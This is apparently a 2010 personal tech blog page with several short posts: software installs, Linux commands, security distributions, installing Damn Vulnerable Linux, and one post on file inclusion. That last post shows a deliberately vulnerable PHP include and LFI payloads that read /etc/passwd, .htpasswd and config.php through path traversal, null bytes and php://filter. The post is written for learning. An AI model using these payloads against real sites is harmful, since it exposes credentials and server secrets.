Tuesday, 30 November 2010
Installing Evan's Debugger in Ubuntu
I needed a debugger(other than GDB) in my ubuntu and searched the net and came across the Evans Debugger. Though installation does not require much work, some of you might want some sort of article on installing it so here it is.
First, we will prepare our system by downloading the required dependencies(QT4 dev and boost dev libraries) and then we compile the debugger source archive we have previously downloaded from HERE.
Follow the steps as below to have the debugger installed on your system.
$ sudo apt-get install libqt4-dev libboost1.42-all-dev
$ tar zxvf debugger-0.9.16.tgz
$ cd debugger-0.9.16
$ qmake -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
$ make
$ sudo make INSTALL_ROOT=/usr install
Now you can make the launcher or shortcut in the menu by giving the path for command as /usr/bin/edb. Hope this helps.
Read more...
First, we will prepare our system by downloading the required dependencies(QT4 dev and boost dev libraries) and then we compile the debugger source archive we have previously downloaded from HERE.
Follow the steps as below to have the debugger installed on your system.
$ sudo apt-get install libqt4-dev libboost1.42-all-dev
$ tar zxvf debugger-0.9.16.tgz
$ cd debugger-0.9.16
$ qmake -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
$ make
$ sudo make INSTALL_ROOT=/usr install
Now you can make the launcher or shortcut in the menu by giving the path for command as /usr/bin/edb. Hope this helps.
Read more...
Installing Evan's Debugger in Ubuntu
2010-11-30T20:46:00+05:45
Cool Samar
hacking|software|tricks and tips|
Comments
Labels:
hacking,
software,
tricks and tips
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Tuesday, 23 November 2010
Some useful linux commands
This page lists some of the useful linux commands you might need to be using frequently. This is however not the complete list of the commands, rather I'd try to post more and more useful linux commands here.
gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.
sudo command - run the command with elevated privilege.
ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.
kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.
ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.
ufw enable/disable - enable or disable the firewall.
uname -a - get every information about your linux kernel.
sudo dpkg --configure -a - configure and repair the broken package.
I'll be updating this list with any commands I happen to remember.
Read more...
gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.
sudo command - run the command with elevated privilege.
ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.
kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.
ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.
ufw enable/disable - enable or disable the firewall.
uname -a - get every information about your linux kernel.
sudo dpkg --configure -a - configure and repair the broken package.
I'll be updating this list with any commands I happen to remember.
Read more...
Some useful linux commands
2010-11-23T23:16:00+05:45
Cool Samar
beginner|linux|tricks and tips|ubuntu|
Comments
Labels:
beginner,
linux,
tricks and tips,
ubuntu
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Making movie from your pictures in ubuntu using PhotoFilmStrip
If you are in the need of creating the movie from your pictures in ubuntu, PhotoFilmStrip might be the perfect tool to use.
PhotoFilmStrip creates movies out of your pictures in just 3 steps. First select your photos, customize the motion path and render the video. There are several output possibilities for VCD, SVCD, DVD up to FULL-HD. This tool creates animated slideshows.
Get the DEB package from PhotoFilmStrip SourceForge
Thanks. :)
Read more...
PhotoFilmStrip creates movies out of your pictures in just 3 steps. First select your photos, customize the motion path and render the video. There are several output possibilities for VCD, SVCD, DVD up to FULL-HD. This tool creates animated slideshows.
Get the DEB package from PhotoFilmStrip SourceForge
Thanks. :)
Read more...
Making movie from your pictures in ubuntu using PhotoFilmStrip
2010-11-23T22:54:00+05:45
Cool Samar
linux|tricks and tips|ubuntu|
Comments
Labels:
linux,
tricks and tips,
ubuntu
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Monday, 22 November 2010
Some hacking and security distribution to try
So you want to learn the art of hacking or you want to be in the professional pen-testing? or whatever related to information security. You can try some of the security and hacking distributions which I've listed as below:
Backtrack: It is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. So don't miss this one.
Site: www.backtrack-linux.org
NodeZero: It is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it's primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also they are preparing a repository of pentest tools so your system will be up to date at all time.
Site: www.netinfinity.org
DEFT Linux: DEFT Linux v6 is based on the new Kernel 2.6.35 (Linux side) and the DEFT Extra 2.1 (Computer Forensic GUI) with the best freeware Windows Computer Forensic tools. DEFT it’s a new concept of Computer Forensic live system that use LXDE as desktop environment and thunar file manager and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.
Site: www.deftlinux.net
Katana: Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.
Site: Katana Home
I'll update this post when I get to know more distros.
Read more...
Backtrack: It is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. So don't miss this one.
Site: www.backtrack-linux.org
NodeZero: It is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it's primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also they are preparing a repository of pentest tools so your system will be up to date at all time.
Site: www.netinfinity.org
DEFT Linux: DEFT Linux v6 is based on the new Kernel 2.6.35 (Linux side) and the DEFT Extra 2.1 (Computer Forensic GUI) with the best freeware Windows Computer Forensic tools. DEFT it’s a new concept of Computer Forensic live system that use LXDE as desktop environment and thunar file manager and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.
Site: www.deftlinux.net
Katana: Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.
Site: Katana Home
I'll update this post when I get to know more distros.
Read more...
Some hacking and security distribution to try
2010-11-22T21:42:00+05:45
Cool Samar
hacking|security|
Comments
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Sunday, 21 November 2010
Enabling telnet in windows 7
AYesterday when I was on my saturday class in kathmandu, I needed to use telnet in order to find the ssh version of some server as the part of recon challenge for my friend. But I found that the windows 7 by default has no telnet client. After returning to KU, I played around with my friends laptop to find the way to enable telnet client.
Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.
Read more...
Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.
Read more...
Enabling telnet in windows 7
2010-11-21T20:14:00+05:45
Cool Samar
beginner|tricks and tips|windows|
Comments
Labels:
beginner,
tricks and tips,
windows
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Nude.js - Nudity detection with javascript and HTMLCanvas
Today I came across an interesting page on nudity detection with javascript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client side nudity detection for child filter and other social media platforms.
nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).
you can download the nude.js from HERE.
For the demo, visit this page.
Read more...
nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).
you can download the nude.js from HERE.
For the demo, visit this page.
Read more...
Nude.js - Nudity detection with javascript and HTMLCanvas
2010-11-21T19:39:00+05:45
Cool Samar
internet|useful website|web|
Comments
Labels:
internet,
useful website,
web
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Friday, 19 November 2010
Installing Damn Vulnerable Linux under virtualbox
I had some problems while installing Damn Vulnerable Linux under virtualbox so I thought I would share the process I did to instal the DVL with virtualbox. I won't be going into the details of what the DVL is, anyway.
First, with the .iso file or the DVD drive, boot with the live DVD of Damn Vulnerable Linux(DVL) and login as root. Now we will prepare partition using fdisk utility. Follow the steps as i describe below:
-> Type startx to start the GUI for DVL.
-> Under konsole, type fdisk /dev/hda. Replace hda with the appropriate disk like /dev/sda for you.
-> Now you'll get the following prompt:
command (m for help):
type the letter n and press enter.
then type the letter p to create a primary partition and type 1 again.
Then type a and then type 1 to make the partition bootable. Finally type w to write the partition table.
-> Now we will format the newly created partition by entering the following command:
mkfs.ext3 /dev/hda1 Replace with the proper device like hda2 or sda1...You might need to restart the VM sometimes before or maybe after doing this.
-> now we create the folders to mount our hdd and DVL iso.
mkdir /mnt/dvl/
mkdir /mnt/iso/
-> Next we mount the hard drive and iso as below:
mount /dev/hda1 /mnt/dvl/
mount /dev/hdc /mnt/iso/
-> The prepartion phase is over. Now lets start the backtrack installer from application menu(Be ReSlaxed > System > Backtrack Installer)
-> Now configure the installer as shown below:
Source(Backtrack CD): /mnt/iso/
Install BackTrack to: /mnt/dvl/
Write MBR to: /dev/hda
Installation Method: Real
Next click on install and wait for the installation and copying of the Damn Vulnerable Linux.
-> Finally enter the following commands in terminal:
chroot /mnt/dvl/ /bin/bash
lilo -v
reboot
Now remove the DVD/.iso file and you should have your DVL installed in your virtual machine.
Read more...
First, with the .iso file or the DVD drive, boot with the live DVD of Damn Vulnerable Linux(DVL) and login as root. Now we will prepare partition using fdisk utility. Follow the steps as i describe below:
-> Type startx to start the GUI for DVL.
-> Under konsole, type fdisk /dev/hda. Replace hda with the appropriate disk like /dev/sda for you.
-> Now you'll get the following prompt:
command (m for help):
type the letter n and press enter.
then type the letter p to create a primary partition and type 1 again.
Then type a and then type 1 to make the partition bootable. Finally type w to write the partition table.
-> Now we will format the newly created partition by entering the following command:
mkfs.ext3 /dev/hda1 Replace with the proper device like hda2 or sda1...You might need to restart the VM sometimes before or maybe after doing this.
-> now we create the folders to mount our hdd and DVL iso.
mkdir /mnt/dvl/
mkdir /mnt/iso/
-> Next we mount the hard drive and iso as below:
mount /dev/hda1 /mnt/dvl/
mount /dev/hdc /mnt/iso/
-> The prepartion phase is over. Now lets start the backtrack installer from application menu(Be ReSlaxed > System > Backtrack Installer)
-> Now configure the installer as shown below:
Source(Backtrack CD): /mnt/iso/
Install BackTrack to: /mnt/dvl/
Write MBR to: /dev/hda
Installation Method: Real
Next click on install and wait for the installation and copying of the Damn Vulnerable Linux.
-> Finally enter the following commands in terminal:
chroot /mnt/dvl/ /bin/bash
lilo -v
reboot
Now remove the DVD/.iso file and you should have your DVL installed in your virtual machine.
Read more...
Installing Damn Vulnerable Linux under virtualbox
2010-11-19T22:27:00+05:45
Cool Samar
hacking|tricks and tips|virtualbox|
Comments
Labels:
hacking,
tricks and tips,
virtualbox
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Variations for exploiting the File Inclusion vulnerability
This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are much more variations and modifications to exploit file inclusion so if you have any, feel free to comment here.
Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php
-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
-> Nullbyte injection
test.php?page=../../../../../etc/passwd
-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.
Read more...
Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php
<?php include("incs/".$_GET['page']); ?>
-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
-> Nullbyte injection
test.php?page=../../../../../etc/passwd
-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.
Read more...
Variations for exploiting the File Inclusion vulnerability
2010-11-19T21:23:00+05:45
Cool Samar
file inclusion|hacking|php|
Comments
Labels:
file inclusion,
hacking,
php
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Subscribe to:
Posts (Atom)